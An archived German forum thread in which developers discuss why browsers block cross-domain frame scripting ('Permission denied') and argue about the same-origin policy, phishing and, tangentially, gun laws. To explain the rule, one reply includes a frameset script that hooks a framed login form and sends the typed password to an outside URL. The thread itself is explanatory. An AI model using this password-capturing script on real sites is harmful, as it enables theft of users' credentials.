nicht angemeldet
Permission Denied
Hallo
Welche Tricks kennt ihr, um ein Permission Problem "auszuhebeln".
ich habe mal ein kleines Beispiel Skript gebaut um das Problem zu demonstrieren:
http://services.amon.cc/start.htm dort auf Öffne dich klicken und es öffnet sich eine Datei auf der Domain bmw.amon.cc
Wenn man dort auf den Link klickt, soll er auf services.amon.cc einen Text in die Eingabe stellen.
Beachtet: Es handelt sich um eine Intranet Applikation bei der nur der IE 5 / IE5.5 und IE6 verwendet wird
(Dh es muss keine saubere Lösung sein und sie muss nicht mit einem anderen Browser gehen) es soll einfach nur klappen, gibts irgendwie tricks wie man es doch irgendwie hinbekommt?
danke,
dominik
-
你好 Dominik,
(Dh es muss keine saubere Lösung sein und sie muss nicht mit einem anderen
Browser gehen) es soll einfach nur klappen, gibts irgendwie tricks wie man
es doch irgendwie hinbekommt?Nein.
再见,
CK-
Hi,
(Dh es muss keine saubere Lösung sein und sie muss nicht mit einem anderen
Browser gehen) es soll einfach nur klappen, gibts irgendwie tricks wie man
es doch irgendwie hinbekommt?Nein.
warum wird das von den Brwosern (von allen?) eigentlich unterbunden?
Gruss,
Ludger-
Hello,
warum wird das von den Brwosern (von allen?) eigentlich unterbunden?
Weil der Programmierer das so eingebaut hat ;-))
Harzliche Grüße aus http://www.annerschbarrich.de
Tom
--
Fortschritt entsteht nur durch die Auseinandersetzung der Kreativen
Nur selber lernen macht schlau-
Hi,
warum wird das von den Brwosern (von allen?) eigentlich unterbunden?
Weil der Programmierer das so eingebaut hat ;-))und warum hat der Programmierer das so eingebaut?
Gruss,
Ludger-
Hello,
warum wird das von den Brwosern (von allen?) eigentlich unterbunden?
Weil der Programmierer das so eingebaut hat ;-))und warum hat der Programmierer das so eingebaut?
Weil sein Chef ihm das so aufgetragen hat.
Harzliche Grüße aus http://www.annerschbarrich.de
Tom
--
Fortschritt entsteht nur durch die Auseinandersetzung der Kreativen
Nur selber lernen macht schlau-
Hi,
warum wird das von den Brwosern (von allen?) eigentlich unterbunden?
Weil der Programmierer das so eingebaut hat ;-))
und warum hat der Programmierer das so eingebaut?
Weil sein Chef ihm das so aufgetragen hat.sonst noch alles OK mit dem kleinen Organ unter der Glatze?
Gruss,
Ludger-
Hello,
warum wird das von den Brwosern (von allen?) eigentlich unterbunden?
Weil der Programmierer das so eingebaut hat ;-))
und warum hat der Programmierer das so eingebaut?
Weil sein Chef ihm das so aufgetragen hat.sonst noch alles OK mit dem kleinen Organ unter der Glatze?
Wieso? *gg*
Harzliche Grüße aus http://www.annerschbarrich.de
Tom
--
Fortschritt entsteht nur durch die Auseinandersetzung der Kreativen
Nur selber lernen macht schlau-
Hallo, Tom,
sei doch mal so nett und erklaere mir, warum Javacript in der genannten Form implementiert ist. Gibt's da irgendwelche ernstzunehmenden Gruende, oder ist das eher eine den oeffentlichen Sicherheitsbedenken geschuldete Massnahme?
Gruss,
Ludger-
Hello,
sei doch mal so nett und erklaere mir, warum Javacript in der genannten Form implementiert ist. Gibt's da irgendwelche ernstzunehmenden Gruende, oder ist das eher eine den oeffentlichen Sicherheitsbedenken geschuldete Massnahme?
Ja.
Man soll nicht in fremde Domains eingreifen können.
Das es trotzdem mit etlichen schmutzigen Tricks geht, zeigen ja die Fälle von Bankbetrügern, die Dir eine email senden und so tun, als wären Sie Deine Bank. Dazu benutzen sie dann auch die Originalseite der Bank, die sie aus einer eigenen Seite heraus aufrufen und die Eingaben umleiten...Ich habe es hoffentlich so plastisch genung und nochmal hoffentlich auch richtig dargestellt.
Harzliche Grüße aus http://www.annerschbarrich.de
Tom
--
Fortschritt entsteht nur durch die Auseinandersetzung der Kreativen
Nur selber lernen macht schlau-
Hi,
Man soll nicht in fremde Domains eingreifen können.
aha, man koennte dort Javascript-Variablen aendern und dann waeren alle boese und ueberrascht.
Unnoetig zu sagen, dass das Argument seicht ist, oder?Das es trotzdem mit etlichen schmutzigen Tricks geht, zeigen ja die Fälle von Bankbetrügern, die Dir eine email senden und so tun, als wären Sie Deine Bank. Dazu benutzen sie dann auch die Originalseite der Bank, die sie aus einer eigenen Seite heraus aufrufen und die Eingaben umleiten...
Ich habe Phishing dank an mich ergangener Phishing-Versuche ein wenig untersucht. Javascript spielt da aber keine Rolle, stattdessen werden Websites "1:1" nachgebaut. Typischerweise mit anderer Startadresse.
Ich habe es hoffentlich so plastisch genung und nochmal hoffentlich auch richtig dargestellt.
Noe, ich bin nicht zufrieden. ;-)
Gruss,
Ludger-
hi,
aha, man koennte dort Javascript-Variablen aendern und dann waeren alle boese und ueberrascht.
Unnoetig zu sagen, dass das Argument seicht ist, oder?vor allem falsch, sowas zu behaupten, würde ich sagen.
Ich habe Phishing dank an mich ergangener Phishing-Versuche ein wenig untersucht. Javascript spielt da aber keine Rolle, stattdessen werden Websites "1:1" nachgebaut. Typischerweise mit anderer Startadresse.
ja sicher, wenn man dem nutzer vorgaukeln kann, sich auf der originalseite zu befinden, die aber trotzdem eine eigene ist, fällt das abfangen der eingaben ja gleich viel leichter, und wird unabhängiger von den unterschiedlichen javascript-fähigkeiten der browser.
Noe, ich bin nicht zufrieden. ;-)
mit dir selbst musst du selber klarzukommen lernen.
gruß,
wahsaga--
"Look, that's why there's rules, understand? So that you _think_ before you break 'em."-
Hi,
Ich habe Phishing dank an mich ergangener Phishing-Versuche ein wenig untersucht. Javascript spielt da aber keine Rolle, stattdessen werden Websites "1:1" nachgebaut. Typischerweise mit anderer Startadresse.
ja sicher, wenn man dem nutzer vorgaukeln kann, sich auf der originalseite zu befinden, die aber trotzdem eine eigene ist, fällt das abfangen der eingaben ja gleich viel leichter, und wird unabhängiger von den unterschiedlichen javascript-fähigkeiten der browser.
also, wenn ich auf der Originalseite bin und der Phisher hat es irgendwie geschafft dort ein Javascript an den Start zu bringen, das auf eine andere Domain verweist und meine Daten dort gephisht werden, dann ist das schlecht. Und so wuerde die bekannte und hier diskutierte Javascript-Einschraenkung Sinn machen.
Aber wer eine Seite ordentlich betreibt, der unterbindet doch wohl das Manipulieren seines selbsterzeugter HTML-Codes, damit von dort nicht auf domainfremde Javacripts verwiesen wird? (Darum laeuft phishing auch nicht ueber Original-Adressen.)
Ne, ich verstehe den Sinn der o.g. Einschraenkung nicht.
Gruss,
Ludger-
Hallo,
also, wenn ich auf der Originalseite bin und der Phisher hat es irgendwie geschafft dort ein Javascript an den Start zu bringen, das auf eine andere Domain verweist und meine Daten dort gephisht werden, dann ist das schlecht. Und so wuerde die bekannte und hier diskutierte Javascript-Einschraenkung Sinn machen.
Nein, das müsste er ohne die hier diskutierte Einschränkung gar nicht. Er könnte die Originalseite völlig unangetastet lassen. Er müsste nur den Quellcode kennen.
Ne, ich verstehe den Sinn der o.g. Einschraenkung nicht.
Beispiel:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>Spion</title>
<script type="text/javascript">
<!--
function setzeSpion() {
frames["meins"].document.forms[0].onsubmit = parent.spioniere;
}function spioniere() {
var pw = frames["meins"].document.forms[0].elements["pw"].value;
alert(pw);
spionURI = "http://www.google.de?pw=" + pw;
location.replace(spionURI);
return false;
}
//-->
</script>
</head>
<frameset rows="100%" onload="setzeSpion();">
<frame name="meins" src="Fremdesformular.html">
</frameset>
</html>Fremdesformular.html:
...
<body>
<form action="irgendeinZiel.pl" method="POST">
...
<input type="Password" name="pw" value="" size="12" maxlength="12">
<input type="Submit" name="Submit" value="Absenden">
</form>
</body>
...Könnte man statt Fremdesformular.html eine beliebige URI einsetzten, und würde frames["meins"].document.forms[0].onsubmit damit funktionieren (was es nicht tut, sondern eben permission denied auswirft), dann müsste man nur noch schauen, welches Formular man ansprechen will und wie der Name des Passwort-Feldes ist.
viele Grüße
Axel
-
Hi,
Könnte man statt Fremdesformular.html eine beliebige URI einsetzten, und würde frames["meins"].document.forms[0].onsubmit damit funktionieren (was es nicht tut, sondern eben permission denied auswirft), dann müsste man nur noch schauen, welches Formular man ansprechen will und wie der Name des Passwort-Feldes ist.
aha, also wegen der "parent - child Kommunikation" (die hatte ich tatsaechlich ganz vergessen).
Danke fuer die Erlaeuterung!
Gruss,
ludger-
Hi,
aha, also wegen der "parent - child Kommunikation" (die hatte ich tatsaechlich ganz vergessen).
aeeh, doch noch eine Nachfrage. Bei "parent - child" muessten doch die beiden Seiten verlinkt sein, was wiederum eine Fahrlaessigkeit des Programmierers waere.
Wie wuerde der Phisher denn ganz genau zum Zuge kommen? (Der muesste doch erst einmal seinen frame set an den Start, also an den Nutzer bringen d.h. der Phisher haette doch dann einige echte praktische Probleme (Webadresse u.a.), oder?)
Gruss,
Ludger-
hi,
aeeh, doch noch eine Nachfrage. Bei "parent - child" muessten doch die beiden Seiten verlinkt sein, was wiederum eine Fahrlaessigkeit des Programmierers waere.
Wie wuerde der Phisher denn ganz genau zum Zuge kommen?
beispielsweise so: http://www.heise.de/security/dienste/browsercheck/demos/popspoof.shtml
(und dabei ist noch nicht mal cross site scripting im einsatz ... die möglichkeiten sind vielfältig.)
gruß,
wahsaga--
"Look, that's why there's rules, understand? So that you _think_ before you break 'em." -
Hallo,
Wie wuerde der Phisher denn ganz genau zum Zuge kommen?
Diese Deine Überlegungen sind, meiner Meinung nach, der falsche Ansatz, um eine Sicherheitseinschränkung zu begründen. Die Frage ist nicht so sehr die, ob und genau wie die Aufhebung der Sicherheitseinschränkung eine Gefährdung bedeuten würde, sondern eher die, was denn die Aufhebung der Sicherheitseinschränkung für einen Nutzen brächte. Muss es domainübergreifende clientseitige Scriptsprachen geben? Die Antwort ist Nein, ergo gibt es das nicht. Muss eine laufende Browserinstanz in der Lage sein beliebige Fenster anderer Browserinstanzen über deren Namen anzusprechen? Die Antwort ist Nein, ergo _sollte_ es das nicht geben.
...
Muss man eine Schusswaffe besitzen dürfen, um sicher zu sein? ...
Ist es notwendig, dass ein PKW eine Höchstgeschwindigkeit von 400 km/h erreichen kann? ...viele Grüße
Axel
-
Hi,
Wie wuerde der Phisher denn ganz genau zum Zuge kommen?
Diese Deine Überlegungen sind, meiner Meinung nach, der falsche Ansatz, um eine Sicherheitseinschränkung zu begründen.hmm?
Die Frage ist nicht so sehr die, ob und genau wie die Aufhebung der Sicherheitseinschränkung eine Gefährdung bedeuten würde, sondern eher die, was denn die Aufhebung der Sicherheitseinschränkung für einen Nutzen brächte.
Sorry, aber das ist falsch. Funktionalitaetseinschraenkungen sind grundsaetzlich, da sie ja gegen das Einfachheitsgebot der IT ("das erste Gesetz" ;-) verstossen, zu begruenden. Keinesfalls sind _primaer_ Ueberlegungen anzustellen, welchen Nutzen Funktionalitaet bringt.
Muss man eine Schusswaffe besitzen dürfen, um sicher zu sein? ...
Ist es notwendig, dass ein PKW eine Höchstgeschwindigkeit von 400 km/h erreichen kann? ...(Es gibt da uebrigens auch zwei unterschiedliche politische Denkweisen. Die Konservativen wuerden gerne einfach nur Verfehlungen Einzelner strafen, waehrend andere (die Sozen fallen mir da gerade ein ;-) gerne Verfehlungen Einzelner unmoeglich machen wollen und zwar indem sie - scheinbar folgerichtig, aber leider auch zu Lasten vieler Nichttaeter - bestimmte "Vortatbestaende" erkennen und bereits unter Strafe stellen, also z.B. den Waffenbesitz ohne entsprechender staatlicher Genehmigung.)
Gruss,
Ludger-
Hallo,
Die Frage ist nicht so sehr die, ob und genau wie die Aufhebung der Sicherheitseinschränkung eine Gefährdung bedeuten würde, sondern eher die, was denn die Aufhebung der Sicherheitseinschränkung für einen Nutzen brächte.
Sorry, aber das ist falsch. Funktionalitaetseinschraenkungen sind grundsaetzlich, da sie ja gegen das Einfachheitsgebot der IT ("das erste Gesetz" ;-) verstossen, zu begruenden.
Du bist, wie bei Deinen politischen Meinungsäußerungen, viel zu pauschal. Es war nicht von Einschränkung der Funktionalität im Allgemeinen, sondern von Einschränkung der Funktionalität in sicherheitsrelevanten Bereichen die Rede. Und ja, das Internet ist ein sicherheitstechnisch sensibler Bereich.
Wenn Deine Pauschalisierung stimmte, dann müssten an allen Servern sämtliche Dienste laufen, für die Ports existieren (maximale Funktionalität), um nur ein Beispiel zu nennen.
Keinesfalls sind _primaer_ Ueberlegungen anzustellen, welchen Nutzen Funktionalitaet bringt.
Bitte lies den Satz nochmal, und sage mir dann, dass Du nicht lachen musstest.
Muss man eine Schusswaffe besitzen dürfen, um sicher zu sein? ...
(Es gibt da uebrigens auch zwei unterschiedliche politische Denkweisen. Die Konservativen wuerden gerne einfach nur Verfehlungen Einzelner strafen, waehrend andere (die Sozen fallen mir da gerade ein ;-) gerne Verfehlungen Einzelner unmoeglich machen wollen und zwar indem sie - scheinbar folgerichtig, aber leider auch zu Lasten vieler Nichttaeter - bestimmte "Vortatbestaende" erkennen und bereits unter Strafe stellen, also z.B. den Waffenbesitz ohne entsprechender staatlicher Genehmigung.)OK, bleiben wir beim Waffenbesitz.
Wer soll die "Verfehlungen Einzelner strafen", bzw. wer soll die Einzelnen finden und der Justiz zuführen? Die Polizei, in dem Wissen, dass _jeder_ _alle_ Schusswaffen besitzen kann? Wie soll die Polizei dann ausgestattet sein, und was soll das kosten?
Inwiefern geht die Einschränkung des Waffenbesitzes "zu Lasten vieler Nichttaeter"?
viele Grüße
Axel
-
Hi,
Es war nicht von Einschränkung der Funktionalität im Allgemeinen, sondern von Einschränkung der Funktionalität in sicherheitsrelevanten Bereichen die Rede. Und ja, das Internet ist ein sicherheitstechnisch sensibler Bereich.
ich habe formal richtig argumentiert.
Wenn Deine Pauschalisierung stimmte, dann müssten an allen Servern sämtliche Dienste laufen, für die Ports existieren (maximale Funktionalität), um nur ein Beispiel zu nennen.
Nein, denn die Funktionalitaetseinschraenkung ist mit der Begrenzheit der zur Verfuegung stehenden CPU-Leistung begruendet. Die Einschraenkung von Javascript-Funktionalitaet ist mit Sicherheitsluecken (phishing, spying) begruendet. Du hattest allerdings die Frage nach dem Nutzen in den Vordergrund geschoben, der nicht gegeben sei. Daraufhin habe ich entgegnet, dass ein nichtvorhandenener Nutzen keine ausreichende Begruendung fuer eine Funktionalitaetseinschraenkung ist. Das ist natuerlich formal richtig.
Keinesfalls sind _primaer_ Ueberlegungen anzustellen, welchen Nutzen Funktionalitaet bringt.
Bitte lies den Satz nochmal, und sage mir dann, dass Du nicht lachen musstest.Er ist genauso gemeint. Wenn es darum geht Funktionalitaet zu reduzieren, dann muss es dafuer triftige Gruende geben und der "soziale" oder geschaeftslogische Nutzen von Funktionalitaet darf auch gerne NULL sein, was aber eben nicht ausreicht eine Funktionalitaetseinschraenkung hinzuzubauen. Das waere nur scheinbar plausibel.
OK, bleiben wir beim Waffenbesitz.
Wer soll die "Verfehlungen Einzelner strafen", bzw. wer soll die Einzelnen finden und der Justiz zuführen? Die Polizei, in dem Wissen, dass _jeder_ _alle_ Schusswaffen besitzen kann? Wie soll die Polizei dann ausgestattet sein, und was soll das kosten?
Inwiefern geht die Einschränkung des Waffenbesitzes "zu Lasten vieler Nichttaeter"?
Nun, es ist logisch korrekter und damit auch wirtschaftlicher nur den missbrauchlichen Gebrauch von Schusswaffen zu strafen, als bspw. den nichtangemeldeten Besitz von Schusswaffen unter Strafe zu stellen.
Wenn man die lustige Diskussion in den franzoesischen Medien bzgl. der Geschwindigkeitsbegrenzung bei Pkw verfolgt hat (Linke wollen eine gesetzlich vorgeschriebene Geschwindigkeitsdrosselung auf 130 (franz. Hoechstgeschwindigkeit auf Autobahnen), also eine in die Pkw eingebaute Drosselung) und viele Diskussionen der vergangenen Jahrzehnte dann erkennt man halt eine gewisse Systematik.
Gruss,
ludger
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Hi,
Welche Tricks kennt ihr, um ein Permission Problem "auszuhebeln".
http://services.amon.cc/start.htm dort auf Öffne dich klicken und es öffnet sich eine Datei auf der Domain bmw.amon.cc
Wenn man dort auf den Link klickt, soll er auf services.amon.cc einen Text in die Eingabe stellen.
Beachtet: Es handelt sich um eine Intranet Applikation bei der nur der IE 5 / IE5.5 und IE6 verwendet wirdWenn es sich ums Intranet handelt: verlagere die Seiten des einen Servers auf den anderen. Dann gibt es das Problem nicht mehr.
cu,
Andreas--
Warum nennt sich Andreas hier MudGuard?
Fachfragen per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.